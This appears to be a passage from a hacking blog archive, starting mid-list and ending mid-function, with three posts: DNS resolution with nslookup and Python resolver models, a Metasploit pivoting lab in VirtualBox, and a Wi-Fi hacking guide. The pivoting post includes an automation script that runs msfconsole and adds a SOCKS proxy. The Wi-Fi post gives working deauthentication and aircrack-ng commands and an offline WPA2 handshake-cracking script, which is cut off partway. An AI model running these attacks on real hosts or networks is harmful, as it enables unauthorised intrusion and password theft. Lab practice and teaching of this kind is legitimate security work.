  5. The top-level domain nameserver tells the DNS resolver the IP address of the authoritative nameserver.
  6. The DNS resolver then queries the authoritative nameserver for the IP address of the domain.
  7. The authoritative nameserver tells the DNS resolver the IP address of the domain.
  8. The DNS resolver responds back to the client with the IP address of the domain.
  9. The client then sends the request to the target IP address.
  10. The target IP address would then respond with the information the client requested.

How DNS Works
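Steps 2 to 7 above are one loop: ask the server you are at, and if it only holds a delegation (an NS record plus the glue A record for that nameserver), move to the nameserver it points at and ask again, until a server answers with the A record itself. The block below is an added example, not code from the original post: it runs that loop over an in-memory model of three zones (root, .com, google.com) and also splits a name into the root, TLD, domain and subdomain parts described in the Domain Structure section. The root and .com server names and addresses match the nslookup session that follows; the google.com answers are constructed TEST-NET addresses.

```python
"""Iterative resolution over a constructed zone model (added example, not from the post)."""

ROOT_SERVER = "198.41.0.4"     # a.root-servers.net, as in the nslookup output below

# Constructed model: each server knows only its own zone. Root and .com entries
# match the nslookup session below; google.com answers are made-up TEST-NET IPs.
ZONES = {
    "198.41.0.4": {                                   # root: TLD delegations only
        "NS": {"com.": "a.gtld-servers.net."},
        "A":  {"a.gtld-servers.net.": "192.5.6.30"},  # glue for the delegation
    },
    "192.5.6.30": {                                   # .com TLD server
        "NS": {"google.com.": "ns1.google.com."},
        "A":  {"ns1.google.com.": "216.239.32.10"},   # glue
    },
    "216.239.32.10": {                                # google.com authoritative
        "NS": {},
        "A":  {"google.com.": "203.0.113.10", "mail.google.com.": "203.0.113.20"},
    },
}


def labels_of(name):
    """'mail.google.com.' -> ['mail', 'google', 'com']; the trailing dot is the root."""
    return [label for label in name.rstrip(".").split(".") if label]


def describe(name):
    """Split a name into the parts the Domain Structure section names."""
    labels = labels_of(name)
    return {
        "root": ".",
        "tld": labels[-1] if labels else "",
        "domain": ".".join(labels[-2:]),
        "subdomain": ".".join(labels[:-2]),
    }


def resolve(name, max_hops=8):
    """Resolve name iteratively from the root. Returns (ip, trace) where trace
    lists each (server, record_type, owner, value) the resolver relied on."""
    fqdn = name if name.endswith(".") else name + "."
    server, trace = ROOT_SERVER, []
    for _ in range(max_hops):
        zone = ZONES[server]
        if fqdn in zone["A"]:                           # steps 6-7: authoritative answer
            trace.append((server, "A", fqdn, zone["A"][fqdn]))
            return zone["A"][fqdn], trace
        labels = labels_of(fqdn)
        # Longest matching delegation wins: 'mail.google.com.' before 'google.com.' before 'com.'
        for i in range(len(labels)):
            suffix = ".".join(labels[i:]) + "."
            if suffix in zone["NS"]:                    # steps 2-5: referral
                ns_name = zone["NS"][suffix]
                trace.append((server, "NS", suffix, ns_name))
                server = zone["A"][ns_name]             # follow the glue record
                break
        else:
            raise LookupError(f"{server} has neither an answer nor a delegation for {fqdn}")
    raise LookupError("delegation chain too long")


if __name__ == "__main__":
    ip, trace = resolve("mail.google.com")
    for hop in trace:
        print(hop)
    print("answer:", ip)
```

The trace for mail.google.com visits exactly the three servers the nslookup walk below visits by hand: the root, a .com server, then ns1.google.com.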

DNS Demonstration

Let’s start at the top! Using the tool nslookup we can query the root nameservers. We simply set the type of query to nameserver and then use a full stop to specify the root servers. As you can see from the output below, nslookup returns all the root server nameservers.

┌─[joe@Parrot]─[~]
└──╼ $nslookup
> set type=ns
> .
Server: 192.168.0.1
Address: 192.168.0.1#53
Non-authoritative answer:
. nameserver = c.root-servers.net.
. nameserver = d.root-servers.net.
. nameserver = e.root-servers.net.
. nameserver = f.root-servers.net.
. nameserver = g.root-servers.net.
. nameserver = h.root-servers.net.
. nameserver = i.root-servers.net.
. nameserver = j.root-servers.net.
. nameserver = k.root-servers.net.
. nameserver = l.root-servers.net.
. nameserver = m.root-servers.net.
. nameserver = a.root-servers.net.
. nameserver = b.root-servers.net.
Authoritative answers can be found from:

In order to query the root server nameservers, we need to find out what their IP addresses are. In order to do that we set the query type to an A record. An A record translates a word to an IP address.

> set type=a
> a.root-servers.net

Server: 192.168.0.1
Address: 192.168.0.1#53
Non-authoritative answer:
Name: a.root-servers.net
Address: 198.41.0.4

Next, we need to find the nameservers of the top-level domain. In order to do that, we first set our server to the IP address that we just obtained from our A record query. Next, we set the record type to the nameserver and then query the “.COM” top-level domain. However, ensure you put a full stop after it.

> server 198.41.0.4
Default server: 198.41.0.4
Address: 198.41.0.4#53
> set type=ns
> com.

;; Truncated, retrying in TCP mode.
Server: 198.41.0.4
Address: 198.41.0.4#53
Non-authoritative answer:
*** Can't find com.: No answer
Authoritative answers can be found from:
com nameserver = e.gtld-servers.net.
com nameserver = b.gtld-servers.net.
com nameserver = j.gtld-servers.net.
com nameserver = m.gtld-servers.net.
com nameserver = i.gtld-servers.net.
com nameserver = f.gtld-servers.net.
com nameserver = a.gtld-servers.net.
com nameserver = g.gtld-servers.net.
com nameserver = h.gtld-servers.net.
com nameserver = l.gtld-servers.net.
com nameserver = k.gtld-servers.net.
com nameserver = c.gtld-servers.net.
com nameserver = d.gtld-servers.net.
e.gtld-servers.net internet address = 192.12.94.30
e.gtld-servers.net has AAAA address 2001:502:1ca1::30
b.gtld-servers.net internet address = 192.33.14.30
b.gtld-servers.net has AAAA address 2001:503:231d::2:30
j.gtld-servers.net internet address = 192.48.79.30
j.gtld-servers.net has AAAA address 2001:502:7094::30
m.gtld-servers.net internet address = 192.55.83.30
m.gtld-servers.net has AAAA address 2001:501:b1f9::30
i.gtld-servers.net internet address = 192.43.172.30
i.gtld-servers.net has AAAA address 2001:503:39c1::30
f.gtld-servers.net internet address = 192.35.51.30
f.gtld-servers.net has AAAA address 2001:503:d414::30
a.gtld-servers.net internet address = 192.5.6.30
a.gtld-servers.net has AAAA address 2001:503:a83e::2:30
g.gtld-servers.net internet address = 192.42.93.30
g.gtld-servers.net has AAAA address 2001:503:eea3::30
h.gtld-servers.net internet address = 192.54.112.30
h.gtld-servers.net has AAAA address 2001:502:8cc::30
l.gtld-servers.net internet address = 192.41.162.30
l.gtld-servers.net has AAAA address 2001:500:d937::30
k.gtld-servers.net internet address = 192.52.178.30
k.gtld-servers.net has AAAA address 2001:503:d2d::30
c.gtld-servers.net internet address = 192.26.92.30
c.gtld-servers.net has AAAA address 2001:503:83eb::30
d.gtld-servers.net internet address = 192.31.80.30
d.gtld-servers.net has AAAA address 2001:500:856e::30

We get a lot of results, and the "No answer" line is expected: the root server is not authoritative for com, so instead of answering it refers us to the servers that are, listing the com NS records along with their glue addresses. Any one of them can be set as our server to ask for a specific domain's nameservers. Set the server to one of the IP addresses listed above, set the type to ns again, then choose a domain and punch it in to find its nameservers.

> server 192.5.6.30
Default server: 192.5.6.30
Address: 192.5.6.30#53
> set type=ns
> google.com.
Server: 192.5.6.30
Address: 192.5.6.30#53
Non-authoritative answer:
*** Can't find google.com.: No answer
Authoritative answers can be found from:
google.com nameserver = ns2.google.com.
google.com nameserver = ns1.google.com.
google.com nameserver = ns3.google.com.
google.com nameserver = ns4.google.com.
ns2.google.com has AAAA address 2001:4860:4802:34::a
ns2.google.com internet address = 216.239.34.10
ns1.google.com has AAAA address 2001:4860:4802:32::a
ns1.google.com internet address = 216.239.32.10
ns3.google.com has AAAA address 2001:4860:4802:36::a
ns3.google.com internet address = 216.239.36.10
ns4.google.com has AAAA address 2001:4860:4802:38::a
ns4.google.com internet address = 216.239.38.10

Finally, we can set our DNS resolver to one of Google's nameservers and query it directly for A records such as mail.google.com. Every step above could be scripted: walk from the root to the TLD to the domain's authoritative servers, then throw a wordlist of subdomains at those servers. That is a subdomain brute force attack, and the tool Fierce does exactly that.

> server 216.239.32.10
Default server: 216.239.32.10
Address: 216.239.32.10#53
> set type=a
> mail.google.com.
Server: 216.239.32.10
Address: 216.239.32.10#53
Name: mail.google.com
Address: 142.250.178.5
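The walk above can be scripted, and it is worth seeing the loop that a resolver (or Fierce) runs. The script below is an added example, not code from the original post or from Fierce. It models the root, the com gTLD server and Google's nameserver with a constructed in-memory referral table built from the addresses in the nslookup output, so query() stands in for a real UDP query and the script runs offline; resolve() follows referrals exactly as we did by hand, and brute_force() is the subdomain-guessing loop on top of it.

```python
"""Iterative DNS resolution, the root -> TLD -> authoritative walk done above by hand.

Added example, not part of the original post and not the Fierce tool. The
referral table below is constructed from the addresses shown in the nslookup
output (a.root-servers.net, a.gtld-servers.net, ns1.google.com); it is only a
subset of the real zones, and query() is an in-memory stand-in for sending a
UDP query to `server`, so the script runs offline.
"""
from typing import Dict, List, Tuple

ROOT_SERVER = "198.41.0.4"          # a.root-servers.net, from the first A lookup

# server IP -> {zone name: (A answers for that exact name, NS referrals with glue IPs)}
Referral = Tuple[List[str], List[Tuple[str, str]]]
ZONES: Dict[str, Dict[str, Referral]] = {
    ROOT_SERVER: {
        "com.": ([], [("a.gtld-servers.net.", "192.5.6.30"),
                      ("b.gtld-servers.net.", "192.33.14.30")]),
    },
    "192.5.6.30": {                                   # a.gtld-servers.net
        "google.com.": ([], [("ns1.google.com.", "216.239.32.10"),
                             ("ns2.google.com.", "216.239.34.10")]),
    },
    "216.239.32.10": {                                # ns1.google.com
        "mail.google.com.": (["142.250.178.5"], []),
    },
}


def query(server: str, qname: str) -> Referral:
    """Stand-in for one DNS query: answer if the server holds the name, else refer."""
    table = ZONES.get(server, {})
    best = None
    for zone in table:
        # the server delegates whatever it is authoritative for (longest suffix wins)
        if qname == zone or qname.endswith("." + zone):
            if best is None or len(zone) > len(best):
                best = zone
    if best is None:
        return [], []                                 # NXDOMAIN / no referral
    answers, referrals = table[best]
    if qname != best:
        answers = []              # exact-name answers only apply to that name
    return answers, referrals


def resolve(name: str, max_hops: int = 8) -> Tuple[List[str], List[str]]:
    """Follow referrals from the root; return (A records, servers asked in order)."""
    qname = name if name.endswith(".") else name + "."   # the trailing dot nslookup wants
    server, path = ROOT_SERVER, [ROOT_SERVER]
    for _ in range(max_hops):
        answers, referrals = query(server, qname)
        if answers:
            return answers, path
        if not referrals:
            return [], path                               # no such name
        # Take the first NS that comes with glue. A real resolver would have to
        # resolve a glueless NS name with a separate walk before continuing.
        _ns_name, server = referrals[0]
        path.append(server)
    raise RuntimeError(f"gave up after {max_hops} referrals for {qname}")


def brute_force(domain: str, words: List[str]) -> Dict[str, List[str]]:
    """Subdomain guessing, the loop Fierce automates: resolve each candidate."""
    found: Dict[str, List[str]] = {}
    for word in words:
        candidate = f"{word}.{domain}"
        answers, _ = resolve(candidate)
        if answers:
            found[candidate] = answers
    return found


if __name__ == "__main__":
    print(resolve("mail.google.com"))
    print(brute_force("google.com", ["mail", "www", "ns1"]))
```

Replacing query() with a real sender (for example dnspython's dns.query.udp) turns this into a live iterative resolver; the rest of the loop stays the same. The glueless-NS case, where a referral names a server without giving its address, is where real resolvers spend most of their complexity.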

Conclusion

I know this isn’t hacking but it’s essential to have a good understanding of the technologies that make the internet and the world wide web possible. There is a lot more to DNS than I’ve covered here. I haven’t discussed the various record types like MX, TXT, and CNAME that can be added to a zone file. I haven’t talked about propagation and caching.

DNS is such a fascinating subject to study because the problem is always DNS. Joking aside, without DNS we would have to remember the IP addresses of every website we wanted to visit. And those root servers at the top of the tree: if they all went down, name resolution would eventually stop, and anything built around fetching resources by domain name would stop with it. In practice the 13 root names are served by hundreds of anycast instances around the world, resolvers cache the root's referrals for long periods, and the root zone is DNSSEC-signed, so a tampered zone file would fail validation on resolvers that validate rather than silently redirecting the internet. It's still a sobering prospect, especially with all the recent talk of cyber armageddon from the World Economic Forum. If someone with a zero-day got into those root servers and messed up the zone files it would cause chaos; hopefully the redundancy and backups hold. Those 13 nameservers are the unsung heroes of the internet and to them I say, thank you. Keep computing away you absolute legends.

Metasploit Pivoting To Hack Segregated Machines

Hello world, welcome to haxez. If you’re new to hacking and cybersecurity then you may have heard about pivoting. If you haven’t then let me explain. Pivoting is where you have compromised a host and discovered it is attached to another network. You then use that host to pivot your scans and attacks to hosts within that other network. For example, imagine you have just compromised a public-facing Web Application server. You check the network configuration and find that it is connected to an internal network. You can then use the compromised web application server to scan that internal network.

Pivoting

Pivoting Labs

I have seen some labs that allow you to practice pivoting but frankly not that many. Some require a complex setup process and others require paying a fee to access them. Then I had a light bulb moment. I've googled around and haven't seen many articles on doing this with VirtualBox. VirtualBox has a number of network adapter settings, one of which is the host-only adapter. Multiple virtual machines can share one host-only adapter, and you can create multiple host-only adapters. My idea (I'm sure many others have had it) was to set up a lab in the following configuration.

  • Kali VM on the host only adapter 1.
  • Vulnerable VM 1 on the host only adapters 1 and 2.
  • Vulnerable VM 2 on the host only adapter 2.

The Kali VM can't reach Vulnerable VM 2 unless it has exploited Vulnerable VM 1 and is pivoting through it.

Lab Set Up

Let’s get to work, first I downloaded Metasploitable 2. I created a new virtual machine and called it Meta1. I then cloned that virtual machine and called it Meta2.

Pivoting — Clone Virtual Machine

Next, I used the host network manager to create a new host-only adapter.

Pivoting — Creating New Host-Only Adapter

After that, I configured the first network adapter on Meta1 to the first host-only adapter. Then I enabled and configured the second network adapter on Meta1 to the second host-only adapter. Finally, I configured the first network adapter on Meta2 to the second host-only adapter. I also made sure that my Kali Linux VM had its network set to the first host-only adapter.

Host Network Configuration

Host Configuration

I booted Meta1 and logged in (msfadmin|msfadmin) and noticed that it only had one interface up (eth0). In that state it can't talk to the second network and therefore can't reach the second target. To fix this, a quick Google search turned up this page in the Ubuntu documentation; the configuring interfaces section explains how to bring an interface up and have it request an address via DHCP.

sudo ip link set dev eth1 up
sudo dhclient eth1
Interface eth1 Configured

Testing Pivoting

Now for the moment of truth: does this allow me to pivot from Meta1 to Meta2? First, we need the IP address of Meta1 on the network it shares with Kali. You can read it from ifconfig on the host, or do it properly with an Nmap ping scan (-sP is the old spelling of -sn; the mass_dns warning is harmless because the host-only network has no DNS server). Our host is online and has the IP address 192.168.56.106.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sP 192.168.56.0/24
[sudo] password for kali:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-10 13:51 EDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.1
Host is up (0.00028s latency).
MAC Address: 0A:00:27:00:00:0B (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.00013s latency).
MAC Address: 08:00:27:DE:8C:96 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.106
Host is up (0.00025s latency).
MAC Address: 08:00:27:82:70:32 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.102
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.05 seconds

Next, I needed a way to establish a connection to the host which would allow quick and easy set up of a pivot. Let’s launch Metasploit.

Metasploit

For simplicity, I chose the ssh_login module and configured it with the remote host’s IP address and the username and password.

msf6 auxiliary(scanner/ssh/ssh_login) > options
Module options (auxiliary/scanner/ssh/ssh_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no
BRUTEFORCE_SPEED 5 yes
DB_ALL_CREDS false no
DB_ALL_PASS false no
DB_ALL_USERS false no
DB_SKIP_EXISTING none no
PASSWORD msfadmin no
PASS_FILE no
RHOSTS 192.168.56.106 yes
RPORT 22 yes
STOP_ON_SUCCESS false yes
THREADS 1 yes
USERNAME msfadmin no
USERPASS_FILE no
USER_AS_PASS false no
USER_FILE no
VERBOSE false yes

I then ran the exploit command and waited for it to complete. We have a shell on the host, but it is a plain SSH shell; to pivot through it we need to upgrade it to a Meterpreter session. First, I listed the sessions with the sessions -l command to find its ID.

msf6 auxiliary(scanner/ssh/ssh_login) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell linux SSH root @ 192.168.56.102:44505 -> 192.168.56.106:22 (192.168.56.106)
3 shell linux SSH root @ 192.168.56.102:41553 -> 192.168.56.106:22 (192.168.56.106)

Next, I instructed Metasploit to upgrade the session to a Meterpreter session.

msf6 auxiliary(scanner/ssh/ssh_login) > sessions -u 3
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [3]
[*] Upgrading session ID: 3
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.56.102:4433
[*] Sending stage (989032 bytes) to 192.168.56.106
[*] Command stager progress: 100.00% (773/773 bytes)

Creating The Pivot

To create the pivot, I jumped into the newly created Meterpreter session and ran the ifconfig command to see what available networks there were.

msf6 auxiliary(scanner/ssh/ssh_login) > sessions -i 4
[*] Starting interaction with 4...

meterpreter > ifconfig

Interface 1
============
Name : lo
Hardware MAC : 00:00:00:00:00:00
MTU : 16436
Flags : UP,LOOPBACK
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::

Interface 2
============
Name : eth0
Hardware MAC : 08:00:27:82:70:32
MTU : 1500
Flags : UP,BROADCAST,MULTICAST
IPv4 Address : 192.168.56.106
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::a00:27ff:fe82:7032
IPv6 Netmask : ffff:ffff:ffff:ffff::

Interface 3
============
Name : eth1
Hardware MAC : 08:00:27:41:4f:ce
MTU : 1500
Flags : UP,BROADCAST,MULTICAST
IPv4 Address : 192.168.242.3
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::a00:27ff:fe41:4fce
IPv6 Netmask : ffff:ffff:ffff:ffff::

Next, I sent the session to the background, selected the autoroute module, and configured it to use session 4.

msf6 post(multi/manage/autoroute) > options
Module options (post/multi/manage/autoroute):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD autoadd yes
NETMASK 255.255.255.0 no
SESSION 4 yes
SUBNET no

I then ran the module and it created the pivot for me: with CMD set to autoadd, autoroute reads the session's interfaces and adds a route for each directly connected network, so 192.168.242.0/24 is now reachable through session 4. You can confirm this with the route print command at the msfconsole prompt.

Finding Hosts Through Pivoting

I then needed to find the target host. Of course, I could have run ifconfig on it but where is the fun in that. I switched to the ping_sweep module, set it to use session 4, gave it the range of the remote network and ran it.

msf6 post(multi/gather/ping_sweep) > options
Module options (post/multi/gather/ping_sweep):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.242.0/24 yes
SESSION 4 yes
msf6 post(multi/gather/ping_sweep) > run
[*] Performing ping sweep for IP range 192.168.242.0/24
[+] 192.168.242.3 host found
[+] 192.168.242.2 host found
[+] 192.168.242.4 host found

Scanning Ports Through Pivoting

Sure enough, our host was there. Of the other two, 192.168.242.3 is Meta1's own eth1 (see the ifconfig output above), and 192.168.242.2 is most likely VirtualBox's own presence on that host-only network (the host adapter or its DHCP server). Our target was 192.168.242.4. So what's next? Service discovery, obviously. I selected the portscan/tcp module, pointed it at the host and ran it. Sure enough it found all the open ports on the host, with every probe travelling through Meta1.

msf6 auxiliary(scanner/portscan/tcp) > options
Module options (auxiliary/scanner/portscan/tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
CONCURRENCY 10 yes
DELAY 0 yes
JITTER 0 yes
PORTS 1-10000 yes
RHOSTS 192.168.242.4 yes
THREADS 1 yes
TIMEOUT 1000 yes

msf6 auxiliary(scanner/portscan/tcp) > run
[+] 192.168.242.4: - 192.168.242.4:25 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:23 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:21 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:22 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:53 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:80 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:111 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:139 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:445 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:512 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:513 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:514 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:1099 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:1524 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:2049 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:2121 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:3306 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:3632 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:5432 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:5900 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:6000 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:6667 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:6697 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:8009 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:8180 - TCP OPEN
[+] 192.168.242.4: - 192.168.242.4:8787 - TCP OPEN
[*] 192.168.242.4: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Just to be on the safe side I tried to ping the host from my Kali VM, to make sure the route only existed inside Metasploit and I hadn't accidentally joined the two networks. Sure enough, from Kali itself the network was unreachable.

┌──(kali㉿kali)-[~]
└─$ ping 192.168.242.4
ping: connect: Network is unreachable
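Having done the pivot by hand once, it is worth automating so the lab can be rebuilt in one go. The script below is an added example, not part of the original post and not shipped with Metasploit. build_pivot_rc() returns the msfconsole commands in the order the post runs them and run_pivot() hands them to msfconsole as a resource script; the session numbers are assumptions (in the post the SSH shell was session 3 and the upgraded Meterpreter session 4), so read yours from sessions -l first. The SOCKS listener at the end is an addition the post does not use: it lets tools outside msfconsole use the same route.

```python
"""The pivot walk-through above as a Metasploit resource script.

Added example, not part of the original post and not shipped with Metasploit.
build_pivot_rc() returns the msfconsole commands in the order the post runs
them; run_pivot() writes them to a file and hands it to msfconsole -r. The
session numbers are assumptions: in the post the SSH shell was session 3 and
the upgraded Meterpreter session 4, so read yours from `sessions -l`.
"""
import subprocess
from pathlib import Path
from typing import List


def build_pivot_rc(meta1_ip: str, internal_net: str, target_ip: str,
                   shell_session: int = 1, met_session: int = 2,
                   user: str = "msfadmin", password: str = "msfadmin") -> str:
    """Return the msfconsole command sequence for the pivot, one command per line."""
    steps: List[str] = [
        # 1. Foothold on Meta1: a plain SSH shell session.
        "use auxiliary/scanner/ssh/ssh_login",
        f"set RHOSTS {meta1_ip}",
        f"set USERNAME {user}",
        f"set PASSWORD {password}",
        "run",
        # 2. Upgrade it to Meterpreter; the handler needs a moment to stage.
        f"sessions -u {shell_session}",
        "sleep 15",
        # 3. Route the second host-only network through the Meterpreter session.
        "use post/multi/manage/autoroute",
        f"set SESSION {met_session}",
        "set CMD autoadd",
        "run",
        "route print",            # the check: internal_net should now be listed
        # 4. Discovery and service scan through the pivot.
        "use post/multi/gather/ping_sweep",
        f"set SESSION {met_session}",
        f"set RHOSTS {internal_net}",
        "run",
        "use auxiliary/scanner/portscan/tcp",
        f"set RHOSTS {target_ip}",
        "set PORTS 1-10000",
        "run",
        # 5. A SOCKS listener so tools outside msfconsole can use the route too.
        "use auxiliary/server/socks_proxy",
        "set SRVHOST 127.0.0.1",
        "set SRVPORT 1080",
        "set VERSION 5",
        "run -j",
    ]
    return "\n".join(steps) + "\n"


def run_pivot(rc_text: str, path: str = "pivot.rc") -> int:
    """Write the script and run it (msfconsole must be on PATH); returns the exit code."""
    Path(path).write_text(rc_text)
    return subprocess.call(["msfconsole", "-q", "-r", path])


if __name__ == "__main__":
    rc = build_pivot_rc("192.168.56.106", "192.168.242.0/24", "192.168.242.4",
                        shell_session=3, met_session=4)
    print(rc)
    # run_pivot(rc)   # uncomment inside the lab
```

With the SOCKS job running, add socks5 127.0.0.1 1080 to /etc/proxychains4.conf and run proxychains nmap -sT -Pn -n -p 21,22,80 192.168.242.4 from Kali. Only TCP connect scans work through a SOCKS proxy: SYN scans, ICMP and UDP do not traverse it, which is why the ping sweep above has to run as a post module on the pivot host.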

Conclusion

So that’s what I’ve been doing today. I had this idea late last night when trying to get to sleep. It actually kept me awake for a while until I got up and wrote it down. This happens to me a lot but I do occasionally have some good ideas. Anyway, I really enjoyed this as I haven’t had much opportunity to experiment with pivoting. I’m actually shocked that I didn’t think of doing this sooner as it’s such an obvious method of practicing it. It was fun setting up, other than having a few errors with Metasploit due to some scripts being broken. Anyway, that’s me done for the day. I will record a video on this soon and upload it to the tube but until then.

How To Hack Wi-Fi Networks

Hello world, welcome to haxez where today we are going to learn how to hack Wi-Fi networks. Wi-Fi networks are everywhere! Whether you're in an industrial or residential area, there will likely be a Wi-Fi access point nearby. They give us instant access to any information we need and let us communicate with people on the other side of the world. We're living in interesting times where information travels at the speed of light. If you're looking for more information on the subject then head over to this article on Bordergate. Also, please go and watch the video at the bottom of the page.

Wi-Fi Hacking Hardware

While it might be possible to perform some Wi-Fi attacks using your built-in Wi-Fi chipset, you will have better success with the proper kit. There are dozens of manufacturers claiming their product offers the required functionality. However, after purchasing a bunch of cheap products and some expensive ones, I can honestly say that Alfa makes the best devices for the job. To hack wireless networks you need an adapter whose chipset and driver support monitor mode and packet injection. Some Alfa cards may be better than others but I've had a lot of luck with the AWUS036ACH.

Wi-Fi Hacking Hardware

Wi-Fi Brute-Force Attacks

One attack that doesn't get mentioned much when discussing Wi-Fi hacking is the brute force attack. Brute force attacks are one of the most common methods that threat actors use to gain access to a system. If the system is secured with a weak password then a brute force attack should get you in pretty quickly, assuming no brute force protection is in the way; you would be surprised how many products don't offer any by default. With a few lines of Python it is possible to brute force an access point's password by attempting to associate with each candidate. See this GitHub repository for an example. Bear in mind that this is an online attack: every guess needs a full association and handshake with the AP, so it is orders of magnitude slower than cracking a captured handshake offline, and far noisier.

Wi-Fi Brute-Force Attacks

Wi-Fi Deauthentication Attack

A Wi-Fi deauthentication attack abuses management frames that the protocol itself provides. In WPA and WPA2 these frames are not authenticated (802.11w, protected management frames, fixes this but is rarely enforced on home networks), so the threat actor can impersonate the access point and send spoofed deauthentication frames to a client, which dutifully disconnects. When the client reconnects it performs the four-way handshake with the access point. The handshake never carries the password itself: it carries two nonces and a MIC computed with a key derived from the passphrase and SSID. The threat actor captures that handshake and then, offline, tries candidate passphrases until one reproduces the MIC.

First, you need to put your Wi-Fi adapter into monitor mode (airmon-ng does this; see the WPS section below) and start capturing. This is done with airodump-ng. Note that airmon-ng usually renames the interface, typically to wlan0mon, so substitute whatever name it gives you for wlan0 in the commands below.

sudo airodump-ng wlan0

Then, you should start receiving information about the access points nearby.

Wi-Fi Deauthentication Attack

Once you know which Wi-Fi network you want to attack, make a note of the BSSID and the channel number. Next, you need to start capturing packets from that AP and writing them to your local storage. This can be done using the airodump-ng tool again.

sudo airodump-ng --bssid <BSSID> --channel <CHANNEL> --write handshake wlan0
Wi-Fi Deauthentication Attack 2

Next, you need to identify a client to attack. As you can see from the image above, one client has connected and we can see its station MAC address. Take note of it as it will be needed for the next step. Using aireplay-ng we send deauthentication frames to that client on the AP's behalf; the 4 is the number of deauth bursts to send.

sudo aireplay-ng --deauth 4 -a <BSSID> -c <CLIENT STATION ID> wlan0
Wi-Fi Deauthentication Attack 3

Finally, it's time to crack the password from the handshake we just captured, using aircrack-ng. First we specify the wordlist, then the AP BSSID, and finally the capture file (airodump-ng numbers its output files, so it will probably be handshake-01.cap). aircrack-ng needs one complete four-way handshake; if it reports that none was found, run the deauth again while airodump-ng is still capturing.

sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt -b <BSSID> handshake.cap
Wi-Fi Deauthentication Attack 4
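What aircrack-ng does in that last step is a simple loop, and it is worth seeing it written out. The script below is an added example; it is not aircrack-ng's code or the original post's. It builds a constructed WPA2 four-way-handshake message 2 (made-up SSID, MAC addresses, nonces and passphrase) in place of a real capture, then recovers the passphrase from a small wordlist the way aircrack-ng or hashcat would: PBKDF2 to the PMK, PRF-512 to the PTK, HMAC over the EAPOL frame to the MIC, compare.

```python
"""Offline WPA2-PSK cracking: the computation aircrack-ng runs against handshake-01.cap.

Added example, not code from the original post or from aircrack-ng. The
"capture" is constructed in code: the SSID, both MAC addresses, the nonces and
the passphrase are all made up, and build_eapol_msg2() stands in for the frame
airodump-ng would have written to disk.
"""
import hashlib
import hmac
from typing import Iterable, Optional

MIC_OFFSET = 81   # EAPOL header (4) + key descriptor fields before the Key MIC (77)

# Constructed handshake parameters (not from any real network).
SSID = "haxez-lab"
AP_MAC = bytes.fromhex("020000000001")       # locally administered, made up
CLIENT_MAC = bytes.fromhex("020000000002")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
TRUE_PASSPHRASE = "password123"


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes): the slow step."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, client_mac: bytes,
                 anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512 from IEEE 802.11i; the first 16 bytes of the PTK are the KCK."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    ptk = b""
    for i in range(4):                               # 4 x 20 bytes covers 64
        ptk += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
    return ptk[:64]


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """Key MIC over the frame with its MIC field zeroed. WPA2 (key descriptor
    version 2) uses HMAC-SHA1-128; original WPA/TKIP (version 1) would use HMAC-MD5."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * 16 + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_eapol_msg2(snonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
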